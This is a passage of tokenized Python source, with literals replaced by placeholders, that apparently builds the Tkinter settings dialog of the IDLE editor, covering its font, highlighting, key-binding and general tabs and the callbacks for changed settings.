, pady = <NUM_LIT:5> ) <EOL> self . buttonApply . pack ( side = LEFT , padx = <NUM_LIT:5> , pady = <NUM_LIT:5> ) <EOL> self . buttonCancel . pack ( side = LEFT , padx = <NUM_LIT:5> , pady = <NUM_LIT:5> ) <EOL> frameActionButtons . pack ( side = BOTTOM ) <EOL> self . tabPages . pack ( side = TOP , expand = TRUE , fill = BOTH ) <EOL> def CreatePageFontTab ( self ) : <EOL> self . fontSize = StringVar ( self ) <EOL> self . fontBold = BooleanVar ( self ) <EOL> self . fontName = StringVar ( self ) <EOL> self . spaceNum = IntVar ( self ) <EOL> self . editFont = tkFont . Font ( self , ( '<STR_LIT>' , <NUM_LIT:10> , '<STR_LIT>' ) ) <EOL> frame = self . tabPages . 
pages [ '<STR_LIT>' ] [ '<STR_LIT>' ] <EOL> frameFont = Frame ( frame , borderwidth = <NUM_LIT:2> , relief = GROOVE ) <EOL> frameIndent = Frame ( frame , borderwidth = <NUM_LIT:2> , relief = GROOVE ) <EOL> labelFontTitle = Label ( frameFont , text = '<STR_LIT>' ) <EOL> frameFontName = Frame ( frameFont ) <EOL> frameFontParam = Frame ( frameFont ) <EOL> labelFontNameTitle = Label ( frameFontName , justify = LEFT , <EOL> text = '<STR_LIT>' ) <EOL> self . listFontName = Listbox ( frameFontName , height = <NUM_LIT:5> , takefocus = FALSE , <EOL> exportselection = FALSE ) <EOL> self . listFontName . bind ( '<STR_LIT>' , self . OnListFontButtonRelease ) <EOL> scrollFont = Scrollbar ( frameFontName ) <EOL> scrollFont . config ( command = self . listFontName . yview ) <EOL> self . listFontName . config ( yscrollcommand = scrollFont . set ) <EOL> labelFontSizeTitle = Label ( frameFontParam , text = '<STR_LIT>' ) <EOL> self . optMenuFontSize = DynOptionMenu ( frameFontParam , self . fontSize , None , <EOL> command = self . SetFontSample ) <EOL> checkFontBold = Checkbutton ( frameFontParam , variable = self . fontBold , <EOL> onvalue = <NUM_LIT:1> , offvalue = <NUM_LIT:0> , text = '<STR_LIT>' , command = self . SetFontSample ) <EOL> frameFontSample = Frame ( frameFont , relief = SOLID , borderwidth = <NUM_LIT:1> ) <EOL> self . labelFontSample = Label ( frameFontSample , <EOL> text = '<STR_LIT>' , <EOL> justify = LEFT , font = self . editFont ) <EOL> frameIndentSize = Frame ( frameIndent ) <EOL> labelSpaceNumTitle = Label ( frameIndentSize , justify = LEFT , <EOL> text = '<STR_LIT>' ) <EOL> self . scaleSpaceNum = Scale ( frameIndentSize , variable = self . spaceNum , <EOL> label = '<STR_LIT>' , orient = '<STR_LIT>' , <EOL> tickinterval = <NUM_LIT:2> , from_ = <NUM_LIT:2> , to = <NUM_LIT:16> ) <EOL> frameFont . pack ( side = LEFT , padx = <NUM_LIT:5> , pady = <NUM_LIT:10> , expand = TRUE , fill = BOTH ) <EOL> frameIndent . 
pack ( side = LEFT , padx = <NUM_LIT:5> , pady = <NUM_LIT:10> , fill = Y ) <EOL> labelFontTitle . pack ( side = TOP , anchor = W , padx = <NUM_LIT:5> , pady = <NUM_LIT:5> ) <EOL> frameFontName . pack ( side = TOP , padx = <NUM_LIT:5> , pady = <NUM_LIT:5> , fill = X ) <EOL> frameFontParam . pack ( side = TOP , padx = <NUM_LIT:5> , pady = <NUM_LIT:5> , fill = X ) <EOL> labelFontNameTitle . pack ( side = TOP , anchor = W ) <EOL> self . listFontName . pack ( side = LEFT , expand = TRUE , fill = X ) <EOL> scrollFont . pack ( side = LEFT , fill = Y ) <EOL> labelFontSizeTitle . pack ( side = LEFT , anchor = W ) <EOL> self . optMenuFontSize . pack ( side = LEFT , anchor = W ) <EOL> checkFontBold . pack ( side = LEFT , anchor = W , padx = <NUM_LIT:20> ) <EOL> frameFontSample . pack ( side = TOP , padx = <NUM_LIT:5> , pady = <NUM_LIT:5> , expand = TRUE , fill = BOTH ) <EOL> self . labelFontSample . pack ( expand = TRUE , fill = BOTH ) <EOL> frameIndentSize . pack ( side = TOP , padx = <NUM_LIT:5> , pady = <NUM_LIT:5> , fill = BOTH ) <EOL> labelSpaceNumTitle . pack ( side = TOP , anchor = W , padx = <NUM_LIT:5> ) <EOL> self . scaleSpaceNum . pack ( side = TOP , padx = <NUM_LIT:5> , fill = X ) <EOL> return frame <EOL> def CreatePageHighlight ( self ) : <EOL> self . builtinTheme = StringVar ( self ) <EOL> self . customTheme = StringVar ( self ) <EOL> self . fgHilite = BooleanVar ( self ) <EOL> self . colour = StringVar ( self ) <EOL> self . fontName = StringVar ( self ) <EOL> self . themeIsBuiltin = BooleanVar ( self ) <EOL> self . highlightTarget = StringVar ( self ) <EOL> frame = self . tabPages . pages [ '<STR_LIT>' ] [ '<STR_LIT>' ] <EOL> frameCustom = Frame ( frame , borderwidth = <NUM_LIT:2> , relief = GROOVE ) <EOL> frameTheme = Frame ( frame , borderwidth = <NUM_LIT:2> , relief = GROOVE ) <EOL> self . 
textHighlightSample = Text ( frameCustom , relief = SOLID , borderwidth = <NUM_LIT:1> , <EOL> font = ( '<STR_LIT>' , <NUM_LIT:12> , '<STR_LIT>' ) , cursor = '<STR_LIT>' , width = <NUM_LIT> , height = <NUM_LIT:10> , <EOL> takefocus = FALSE , highlightthickness = <NUM_LIT:0> , wrap = NONE ) <EOL> text = self . textHighlightSample <EOL> text . bind ( '<STR_LIT>' , lambda e : '<STR_LIT>' ) <EOL> text . bind ( '<STR_LIT>' , lambda e : '<STR_LIT>' ) <EOL> textAndTags = ( ( '<STR_LIT>' , '<STR_LIT>' ) , ( '<STR_LIT:\n>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , ( '<STR_LIT:\n>' , '<STR_LIT>' ) , ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT:U+0020>' , '<STR_LIT>' ) , ( '<STR_LIT>' , '<STR_LIT>' ) , ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , ( '<STR_LIT>' , '<STR_LIT:string>' ) , ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( "<STR_LIT>" , '<STR_LIT:string>' ) , ( '<STR_LIT>' , '<STR_LIT>' ) , ( "<STR_LIT>" , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , ( "<STR_LIT>" , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , ( '<STR_LIT:list>' , '<STR_LIT>' ) , ( '<STR_LIT:(>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT:None>' , '<STR_LIT>' ) , ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT:error>' ) , ( '<STR_LIT:U+0020>' , '<STR_LIT>' ) , ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , ( '<STR_LIT>' , '<STR_LIT>' ) , ( '<STR_LIT:U+0020>' , '<STR_LIT>' ) , ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT:U+0020>' , '<STR_LIT>' ) , ( '<STR_LIT>' , '<STR_LIT>' ) , ( '<STR_LIT:\n>' , '<STR_LIT>' ) ) <EOL> for txTa in textAndTags : <EOL> text . insert ( END , txTa [ <NUM_LIT:0> ] , txTa [ <NUM_LIT:1> ] ) <EOL> for element in self . themeElements . keys ( ) : <EOL> text . tag_bind ( self . themeElements [ element ] [ <NUM_LIT:0> ] , '<STR_LIT>' , <EOL> lambda event , elem = element : event . widget . winfo_toplevel ( ) <EOL> . highlightTarget . set ( elem ) ) <EOL> text . 
config ( state = DISABLED ) <EOL> self . frameColourSet = Frame ( frameCustom , relief = SOLID , borderwidth = <NUM_LIT:1> ) <EOL> frameFgBg = Frame ( frameCustom ) <EOL> labelCustomTitle = Label ( frameCustom , text = '<STR_LIT>' ) <EOL> buttonSetColour = Button ( self . frameColourSet , text = '<STR_LIT>' , <EOL> command = self . GetColour , highlightthickness = <NUM_LIT:0> ) <EOL> self . optMenuHighlightTarget = DynOptionMenu ( self . frameColourSet , <EOL> self . highlightTarget , None , highlightthickness = <NUM_LIT:0> ) <EOL> self . radioFg = Radiobutton ( frameFgBg , variable = self . fgHilite , <EOL> value = <NUM_LIT:1> , text = '<STR_LIT>' , command = self . SetColourSampleBinding ) <EOL> self . radioBg = Radiobutton ( frameFgBg , variable = self . fgHilite , <EOL> value = <NUM_LIT:0> , text = '<STR_LIT>' , command = self . SetColourSampleBinding ) <EOL> self . fgHilite . set ( <NUM_LIT:1> ) <EOL> buttonSaveCustomTheme = Button ( frameCustom , <EOL> text = '<STR_LIT>' , command = self . SaveAsNewTheme ) <EOL> labelThemeTitle = Label ( frameTheme , text = '<STR_LIT>' ) <EOL> labelTypeTitle = Label ( frameTheme , text = '<STR_LIT>' ) <EOL> self . radioThemeBuiltin = Radiobutton ( frameTheme , variable = self . themeIsBuiltin , <EOL> value = <NUM_LIT:1> , command = self . SetThemeType , text = '<STR_LIT>' ) <EOL> self . radioThemeCustom = Radiobutton ( frameTheme , variable = self . themeIsBuiltin , <EOL> value = <NUM_LIT:0> , command = self . SetThemeType , text = '<STR_LIT>' ) <EOL> self . optMenuThemeBuiltin = DynOptionMenu ( frameTheme , <EOL> self . builtinTheme , None , command = None ) <EOL> self . optMenuThemeCustom = DynOptionMenu ( frameTheme , <EOL> self . customTheme , None , command = None ) <EOL> self . buttonDeleteCustomTheme = Button ( frameTheme , text = '<STR_LIT>' , <EOL> command = self . DeleteCustomTheme ) <EOL> frameCustom . pack ( side = LEFT , padx = <NUM_LIT:5> , pady = <NUM_LIT:10> , expand = TRUE , fill = BOTH ) <EOL> frameTheme . 
pack ( side = LEFT , padx = <NUM_LIT:5> , pady = <NUM_LIT:10> , fill = Y ) <EOL> labelCustomTitle . pack ( side = TOP , anchor = W , padx = <NUM_LIT:5> , pady = <NUM_LIT:5> ) <EOL> self . frameColourSet . pack ( side = TOP , padx = <NUM_LIT:5> , pady = <NUM_LIT:5> , expand = TRUE , fill = X ) <EOL> frameFgBg . pack ( side = TOP , padx = <NUM_LIT:5> , pady = <NUM_LIT:0> ) <EOL> self . textHighlightSample . pack ( side = TOP , padx = <NUM_LIT:5> , pady = <NUM_LIT:5> , expand = TRUE , <EOL> fill = BOTH ) <EOL> buttonSetColour . pack ( side = TOP , expand = TRUE , fill = X , padx = <NUM_LIT:8> , pady = <NUM_LIT:4> ) <EOL> self . optMenuHighlightTarget . pack ( side = TOP , expand = TRUE , fill = X , padx = <NUM_LIT:8> , pady = <NUM_LIT:3> ) <EOL> self . radioFg . pack ( side = LEFT , anchor = E ) <EOL> self . radioBg . pack ( side = RIGHT , anchor = W ) <EOL> buttonSaveCustomTheme . pack ( side = BOTTOM , fill = X , padx = <NUM_LIT:5> , pady = <NUM_LIT:5> ) <EOL> labelThemeTitle . pack ( side = TOP , anchor = W , padx = <NUM_LIT:5> , pady = <NUM_LIT:5> ) <EOL> labelTypeTitle . pack ( side = TOP , anchor = W , padx = <NUM_LIT:5> , pady = <NUM_LIT:5> ) <EOL> self . radioThemeBuiltin . pack ( side = TOP , anchor = W , padx = <NUM_LIT:5> ) <EOL> self . radioThemeCustom . pack ( side = TOP , anchor = W , padx = <NUM_LIT:5> , pady = <NUM_LIT:2> ) <EOL> self . optMenuThemeBuiltin . pack ( side = TOP , fill = X , padx = <NUM_LIT:5> , pady = <NUM_LIT:5> ) <EOL> self . optMenuThemeCustom . pack ( side = TOP , fill = X , anchor = W , padx = <NUM_LIT:5> , pady = <NUM_LIT:5> ) <EOL> self . buttonDeleteCustomTheme . pack ( side = TOP , fill = X , padx = <NUM_LIT:5> , pady = <NUM_LIT:5> ) <EOL> return frame <EOL> def CreatePageKeys ( self ) : <EOL> self . bindingTarget = StringVar ( self ) <EOL> self . builtinKeys = StringVar ( self ) <EOL> self . customKeys = StringVar ( self ) <EOL> self . keysAreBuiltin = BooleanVar ( self ) <EOL> self . 
keyBinding = StringVar ( self ) <EOL> frame = self . tabPages . pages [ '<STR_LIT>' ] [ '<STR_LIT>' ] <EOL> frameCustom = Frame ( frame , borderwidth = <NUM_LIT:2> , relief = GROOVE ) <EOL> frameKeySets = Frame ( frame , borderwidth = <NUM_LIT:2> , relief = GROOVE ) <EOL> frameTarget = Frame ( frameCustom ) <EOL> labelCustomTitle = Label ( frameCustom , text = '<STR_LIT>' ) <EOL> labelTargetTitle = Label ( frameTarget , text = '<STR_LIT>' ) <EOL> scrollTargetY = Scrollbar ( frameTarget ) <EOL> scrollTargetX = Scrollbar ( frameTarget , orient = HORIZONTAL ) <EOL> self . listBindings = Listbox ( frameTarget , takefocus = FALSE , <EOL> exportselection = FALSE ) <EOL> self . listBindings . bind ( '<STR_LIT>' , self . KeyBindingSelected ) <EOL> scrollTargetY . config ( command = self . listBindings . yview ) <EOL> scrollTargetX . config ( command = self . listBindings . xview ) <EOL> self . listBindings . config ( yscrollcommand = scrollTargetY . set ) <EOL> self . listBindings . config ( xscrollcommand = scrollTargetX . set ) <EOL> self . buttonNewKeys = Button ( frameCustom , text = '<STR_LIT>' , <EOL> command = self . GetNewKeys , state = DISABLED ) <EOL> buttonSaveCustomKeys = Button ( frameCustom , <EOL> text = '<STR_LIT>' , command = self . SaveAsNewKeySet ) <EOL> labelKeysTitle = Label ( frameKeySets , text = '<STR_LIT>' ) <EOL> labelTypeTitle = Label ( frameKeySets , text = '<STR_LIT>' ) <EOL> self . radioKeysBuiltin = Radiobutton ( frameKeySets , variable = self . keysAreBuiltin , <EOL> value = <NUM_LIT:1> , command = self . SetKeysType , text = '<STR_LIT>' ) <EOL> self . radioKeysCustom = Radiobutton ( frameKeySets , variable = self . keysAreBuiltin , <EOL> value = <NUM_LIT:0> , command = self . SetKeysType , text = '<STR_LIT>' ) <EOL> self . optMenuKeysBuiltin = DynOptionMenu ( frameKeySets , <EOL> self . builtinKeys , None , command = None ) <EOL> self . optMenuKeysCustom = DynOptionMenu ( frameKeySets , <EOL> self . 
customKeys , None , command = None ) <EOL> self . buttonDeleteCustomKeys = Button ( frameKeySets , text = '<STR_LIT>' , <EOL> command = self . DeleteCustomKeys ) <EOL> frameCustom . pack ( side = LEFT , padx = <NUM_LIT:5> , pady = <NUM_LIT:5> , expand = TRUE , fill = BOTH ) <EOL> frameKeySets . pack ( side = LEFT , padx = <NUM_LIT:5> , pady = <NUM_LIT:5> , fill = Y ) <EOL> labelCustomTitle . pack ( side = TOP , anchor = W , padx = <NUM_LIT:5> , pady = <NUM_LIT:5> ) <EOL> buttonSaveCustomKeys . pack ( side = BOTTOM , fill = X , padx = <NUM_LIT:5> , pady = <NUM_LIT:5> ) <EOL> self . buttonNewKeys . pack ( side = BOTTOM , fill = X , padx = <NUM_LIT:5> , pady = <NUM_LIT:5> ) <EOL> frameTarget . pack ( side = LEFT , padx = <NUM_LIT:5> , pady = <NUM_LIT:5> , expand = TRUE , fill = BOTH ) <EOL> frameTarget . columnconfigure ( <NUM_LIT:0> , weight = <NUM_LIT:1> ) <EOL> frameTarget . rowconfigure ( <NUM_LIT:1> , weight = <NUM_LIT:1> ) <EOL> labelTargetTitle . grid ( row = <NUM_LIT:0> , column = <NUM_LIT:0> , columnspan = <NUM_LIT:2> , sticky = W ) <EOL> self . listBindings . grid ( row = <NUM_LIT:1> , column = <NUM_LIT:0> , sticky = NSEW ) <EOL> scrollTargetY . grid ( row = <NUM_LIT:1> , column = <NUM_LIT:1> , sticky = NS ) <EOL> scrollTargetX . grid ( row = <NUM_LIT:2> , column = <NUM_LIT:0> , sticky = EW ) <EOL> labelKeysTitle . pack ( side = TOP , anchor = W , padx = <NUM_LIT:5> , pady = <NUM_LIT:5> ) <EOL> labelTypeTitle . pack ( side = TOP , anchor = W , padx = <NUM_LIT:5> , pady = <NUM_LIT:5> ) <EOL> self . radioKeysBuiltin . pack ( side = TOP , anchor = W , padx = <NUM_LIT:5> ) <EOL> self . radioKeysCustom . pack ( side = TOP , anchor = W , padx = <NUM_LIT:5> , pady = <NUM_LIT:2> ) <EOL> self . optMenuKeysBuiltin . pack ( side = TOP , fill = X , padx = <NUM_LIT:5> , pady = <NUM_LIT:5> ) <EOL> self . optMenuKeysCustom . pack ( side = TOP , fill = X , anchor = W , padx = <NUM_LIT:5> , pady = <NUM_LIT:5> ) <EOL> self . buttonDeleteCustomKeys . 
pack ( side = TOP , fill = X , padx = <NUM_LIT:5> , pady = <NUM_LIT:5> ) <EOL> return frame <EOL> def CreatePageGeneral ( self ) : <EOL> self . winWidth = StringVar ( self ) <EOL> self . winHeight = StringVar ( self ) <EOL> self . paraWidth = StringVar ( self ) <EOL> self . startupEdit = IntVar ( self ) <EOL> self . autoSave = IntVar ( self ) <EOL> self . encoding = StringVar ( self ) <EOL> self . userHelpBrowser = BooleanVar ( self ) <EOL> self . helpBrowser = StringVar ( self ) <EOL> frame = self . tabPages . pages [ '<STR_LIT>' ] [ '<STR_LIT>' ] <EOL> frameRun = Frame ( frame , borderwidth = <NUM_LIT:2> , relief = GROOVE ) <EOL> frameSave = Frame ( frame , borderwidth = <NUM_LIT:2> , relief = GROOVE ) <EOL> frameWinSize = Frame ( frame , borderwidth = <NUM_LIT:2> , relief = GROOVE ) <EOL> frameParaSize = Frame ( frame , borderwidth = <NUM_LIT:2> , relief = GROOVE ) <EOL> frameEncoding = Frame ( frame , borderwidth = <NUM_LIT:2> , relief = GROOVE ) <EOL> frameHelp = Frame ( frame , borderwidth = <NUM_LIT:2> , relief = GROOVE ) <EOL> labelRunTitle = Label ( frameRun , text = '<STR_LIT>' ) <EOL> labelRunChoiceTitle = Label ( frameRun , text = '<STR_LIT>' ) <EOL> radioStartupEdit = Radiobutton ( frameRun , variable = self . startupEdit , <EOL> value = <NUM_LIT:1> , command = self . SetKeysType , text = "<STR_LIT>" ) <EOL> radioStartupShell = Radiobutton ( frameRun , variable = self . startupEdit , <EOL> value = <NUM_LIT:0> , command = self . SetKeysType , text = '<STR_LIT>' ) <EOL> labelSaveTitle = Label ( frameSave , text = '<STR_LIT>' ) <EOL> labelRunSaveTitle = Label ( frameSave , text = '<STR_LIT>' ) <EOL> radioSaveAsk = Radiobutton ( frameSave , variable = self . autoSave , <EOL> value = <NUM_LIT:0> , command = self . SetKeysType , text = "<STR_LIT>" ) <EOL> radioSaveAuto = Radiobutton ( frameSave , variable = self . autoSave , <EOL> value = <NUM_LIT:1> , command = self . 
SetKeysType , text = '<STR_LIT>' ) <EOL> labelWinSizeTitle = Label ( frameWinSize , text = '<STR_LIT>' + <EOL> '<STR_LIT>' ) <EOL> labelWinWidthTitle = Label ( frameWinSize , text = '<STR_LIT>' ) <EOL> entryWinWidth = Entry ( frameWinSize , textvariable = self . winWidth , <EOL> width = <NUM_LIT:3> ) <EOL> labelWinHeightTitle = Label ( frameWinSize , text = '<STR_LIT>' ) <EOL> entryWinHeight = Entry ( frameWinSize , textvariable = self . winHeight , <EOL> width = <NUM_LIT:3> ) <EOL> labelParaWidthTitle = Label ( frameParaSize , text = '<STR_LIT>' + <EOL> '<STR_LIT>' ) <EOL> entryParaWidth = Entry ( frameParaSize , textvariable = self . paraWidth , <EOL> width = <NUM_LIT:3> ) <EOL> labelEncodingTitle = Label ( frameEncoding , text = "<STR_LIT>" ) <EOL> radioEncLocale = Radiobutton ( frameEncoding , variable = self . encoding , <EOL> value = "<STR_LIT>" , text = "<STR_LIT>" ) <EOL> radioEncUTF8 = Radiobutton ( frameEncoding , variable = self . encoding , <EOL> value = "<STR_LIT:utf-8>" , text = "<STR_LIT>" ) <EOL> radioEncNone = Radiobutton ( frameEncoding , variable = self . encoding , <EOL> value = "<STR_LIT:none>" , text = "<STR_LIT:None>" ) <EOL> frameHelpList = Frame ( frameHelp ) <EOL> frameHelpListButtons = Frame ( frameHelpList ) <EOL> labelHelpListTitle = Label ( frameHelpList , text = '<STR_LIT>' ) <EOL> scrollHelpList = Scrollbar ( frameHelpList ) <EOL> self . listHelp = Listbox ( frameHelpList , height = <NUM_LIT:5> , takefocus = FALSE , <EOL> exportselection = FALSE ) <EOL> scrollHelpList . config ( command = self . listHelp . yview ) <EOL> self . listHelp . config ( yscrollcommand = scrollHelpList . set ) <EOL> self . listHelp . bind ( '<STR_LIT>' , self . HelpSourceSelected ) <EOL> self . buttonHelpListEdit = Button ( frameHelpListButtons , text = '<STR_LIT>' , <EOL> state = DISABLED , width = <NUM_LIT:8> , command = self . HelpListItemEdit ) <EOL> self . 
buttonHelpListAdd = Button ( frameHelpListButtons , text = '<STR_LIT>' , <EOL> width = <NUM_LIT:8> , command = self . HelpListItemAdd ) <EOL> self . buttonHelpListRemove = Button ( frameHelpListButtons , text = '<STR_LIT>' , <EOL> state = DISABLED , width = <NUM_LIT:8> , command = self . HelpListItemRemove ) <EOL> frameRun . pack ( side = TOP , padx = <NUM_LIT:5> , pady = <NUM_LIT:5> , fill = X ) <EOL> frameSave . pack ( side = TOP , padx = <NUM_LIT:5> , pady = <NUM_LIT:5> , fill = X ) <EOL> frameWinSize . pack ( side = TOP , padx = <NUM_LIT:5> , pady = <NUM_LIT:5> , fill = X ) <EOL> frameParaSize . pack ( side = TOP , padx = <NUM_LIT:5> , pady = <NUM_LIT:5> , fill = X ) <EOL> frameEncoding . pack ( side = TOP , padx = <NUM_LIT:5> , pady = <NUM_LIT:5> , fill = X ) <EOL> frameHelp . pack ( side = TOP , padx = <NUM_LIT:5> , pady = <NUM_LIT:5> , expand = TRUE , fill = BOTH ) <EOL> labelRunTitle . pack ( side = TOP , anchor = W , padx = <NUM_LIT:5> , pady = <NUM_LIT:5> ) <EOL> labelRunChoiceTitle . pack ( side = LEFT , anchor = W , padx = <NUM_LIT:5> , pady = <NUM_LIT:5> ) <EOL> radioStartupShell . pack ( side = RIGHT , anchor = W , padx = <NUM_LIT:5> , pady = <NUM_LIT:5> ) <EOL> radioStartupEdit . pack ( side = RIGHT , anchor = W , padx = <NUM_LIT:5> , pady = <NUM_LIT:5> ) <EOL> labelSaveTitle . pack ( side = TOP , anchor = W , padx = <NUM_LIT:5> , pady = <NUM_LIT:5> ) <EOL> labelRunSaveTitle . pack ( side = LEFT , anchor = W , padx = <NUM_LIT:5> , pady = <NUM_LIT:5> ) <EOL> radioSaveAuto . pack ( side = RIGHT , anchor = W , padx = <NUM_LIT:5> , pady = <NUM_LIT:5> ) <EOL> radioSaveAsk . pack ( side = RIGHT , anchor = W , padx = <NUM_LIT:5> , pady = <NUM_LIT:5> ) <EOL> labelWinSizeTitle . pack ( side = LEFT , anchor = W , padx = <NUM_LIT:5> , pady = <NUM_LIT:5> ) <EOL> entryWinHeight . pack ( side = RIGHT , anchor = E , padx = <NUM_LIT:10> , pady = <NUM_LIT:5> ) <EOL> labelWinHeightTitle . pack ( side = RIGHT , anchor = E , pady = <NUM_LIT:5> ) <EOL> entryWinWidth . 
pack ( side = RIGHT , anchor = E , padx = <NUM_LIT:10> , pady = <NUM_LIT:5> ) <EOL> labelWinWidthTitle . pack ( side = RIGHT , anchor = E , pady = <NUM_LIT:5> ) <EOL> labelParaWidthTitle . pack ( side = LEFT , anchor = W , padx = <NUM_LIT:5> , pady = <NUM_LIT:5> ) <EOL> entryParaWidth . pack ( side = RIGHT , anchor = E , padx = <NUM_LIT:10> , pady = <NUM_LIT:5> ) <EOL> labelEncodingTitle . pack ( side = LEFT , anchor = W , padx = <NUM_LIT:5> , pady = <NUM_LIT:5> ) <EOL> radioEncNone . pack ( side = RIGHT , anchor = E , pady = <NUM_LIT:5> ) <EOL> radioEncUTF8 . pack ( side = RIGHT , anchor = E , pady = <NUM_LIT:5> ) <EOL> radioEncLocale . pack ( side = RIGHT , anchor = E , pady = <NUM_LIT:5> ) <EOL> frameHelpListButtons . pack ( side = RIGHT , padx = <NUM_LIT:5> , pady = <NUM_LIT:5> , fill = Y ) <EOL> frameHelpList . pack ( side = TOP , padx = <NUM_LIT:5> , pady = <NUM_LIT:5> , expand = TRUE , fill = BOTH ) <EOL> labelHelpListTitle . pack ( side = TOP , anchor = W ) <EOL> scrollHelpList . pack ( side = RIGHT , anchor = W , fill = Y ) <EOL> self . listHelp . pack ( side = LEFT , anchor = E , expand = TRUE , fill = BOTH ) <EOL> self . buttonHelpListEdit . pack ( side = TOP , anchor = W , pady = <NUM_LIT:5> ) <EOL> self . buttonHelpListAdd . pack ( side = TOP , anchor = W ) <EOL> self . buttonHelpListRemove . pack ( side = TOP , anchor = W , pady = <NUM_LIT:5> ) <EOL> return frame <EOL> def AttachVarCallbacks ( self ) : <EOL> self . fontSize . trace_variable ( '<STR_LIT:w>' , self . VarChanged_fontSize ) <EOL> self . fontName . trace_variable ( '<STR_LIT:w>' , self . VarChanged_fontName ) <EOL> self . fontBold . trace_variable ( '<STR_LIT:w>' , self . VarChanged_fontBold ) <EOL> self . spaceNum . trace_variable ( '<STR_LIT:w>' , self . VarChanged_spaceNum ) <EOL> self . colour . trace_variable ( '<STR_LIT:w>' , self . VarChanged_colour ) <EOL> self . builtinTheme . trace_variable ( '<STR_LIT:w>' , self . VarChanged_builtinTheme ) <EOL> self . customTheme . 
trace_variable ( '<STR_LIT:w>' , self . VarChanged_customTheme ) <EOL> self . themeIsBuiltin . trace_variable ( '<STR_LIT:w>' , self . VarChanged_themeIsBuiltin ) <EOL> self . highlightTarget . trace_variable ( '<STR_LIT:w>' , self . VarChanged_highlightTarget ) <EOL> self . keyBinding . trace_variable ( '<STR_LIT:w>' , self . VarChanged_keyBinding ) <EOL> self . builtinKeys . trace_variable ( '<STR_LIT:w>' , self . VarChanged_builtinKeys ) <EOL> self . customKeys . trace_variable ( '<STR_LIT:w>' , self . VarChanged_customKeys ) <EOL> self . keysAreBuiltin . trace_variable ( '<STR_LIT:w>' , self . VarChanged_keysAreBuiltin ) <EOL> self . winWidth . trace_variable ( '<STR_LIT:w>' , self . VarChanged_winWidth ) <EOL> self . winHeight . trace_variable ( '<STR_LIT:w>' , self . VarChanged_winHeight ) <EOL> self . paraWidth . trace_variable ( '<STR_LIT:w>' , self . VarChanged_paraWidth ) <EOL> self . startupEdit . trace_variable ( '<STR_LIT:w>' , self . VarChanged_startupEdit ) <EOL> self . autoSave . trace_variable ( '<STR_LIT:w>' , self . VarChanged_autoSave ) <EOL> self . encoding . trace_variable ( '<STR_LIT:w>' , self . VarChanged_encoding ) <EOL> def VarChanged_fontSize ( self , * params ) : <EOL> value = self . fontSize . get ( ) <EOL> self . AddChangedItem ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , value ) <EOL> def VarChanged_fontName ( self , * params ) : <EOL> value = self . fontName . get ( ) <EOL> self . AddChangedItem ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , value ) <EOL> def VarChanged_fontBold ( self , * params ) : <EOL> value = self . fontBold . get ( ) <EOL> self . AddChangedItem ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , value ) <EOL> def VarChanged_spaceNum ( self , * params ) : <EOL> value = self . spaceNum . get ( ) <EOL> self . AddChangedItem ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , value ) <EOL> def VarChanged_colour ( self , * params ) : <EOL> self . 
OnNewColourSet ( ) <EOL> def VarChanged_builtinTheme ( self , * params ) : <EOL> value = self . builtinTheme . get ( ) <EOL> self . AddChangedItem ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT:name>' , value ) <EOL> self . PaintThemeSample ( ) <EOL> def VarChanged_customTheme ( self , * params ) : <EOL> value = self . customTheme . get ( ) <EOL> if value != '<STR_LIT>' : <EOL> self . AddChangedItem ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT:name>' , value ) <EOL> self . PaintThemeSample ( ) <EOL> def VarChanged_themeIsBuiltin ( self , * params ) : <EOL> value = self . themeIsBuiltin . get ( ) <EOL> self . AddChangedItem ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT:default>' , value ) <EOL> if value : <EOL> self . VarChanged_builtinTheme ( ) <EOL> else : <EOL> self . VarChanged_customTheme ( ) <EOL> def VarChanged_highlightTarget ( self , * params ) : <EOL> self . SetHighlightTarget ( ) <EOL> def VarChanged_keyBinding ( self , * params ) : <EOL> value = self . keyBinding . get ( ) <EOL> keySet = self . customKeys . get ( ) <EOL> event = self . listBindings . get ( ANCHOR ) . split ( ) [ <NUM_LIT:0> ] <EOL> if idleConf . IsCoreBinding ( event ) : <EOL> self . AddChangedItem ( '<STR_LIT>' , keySet , event , value ) <EOL> else : <EOL> extName = idleConf . GetExtnNameForEvent ( event ) <EOL> extKeybindSection = extName + '<STR_LIT>' <EOL> self . AddChangedItem ( '<STR_LIT>' , extKeybindSection , event , value ) <EOL> def VarChanged_builtinKeys ( self , * params ) : <EOL> value = self . builtinKeys . get ( ) <EOL> self . AddChangedItem ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT:name>' , value ) <EOL> self . LoadKeysList ( value ) <EOL> def VarChanged_customKeys ( self , * params ) : <EOL> value = self . customKeys . get ( ) <EOL> if value != '<STR_LIT>' : <EOL> self . AddChangedItem ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT:name>' , value ) <EOL> self . LoadKeysList ( value ) <EOL> def VarChanged_keysAreBuiltin ( self , * params ) : <EOL> value = self . keysAreBuiltin . 
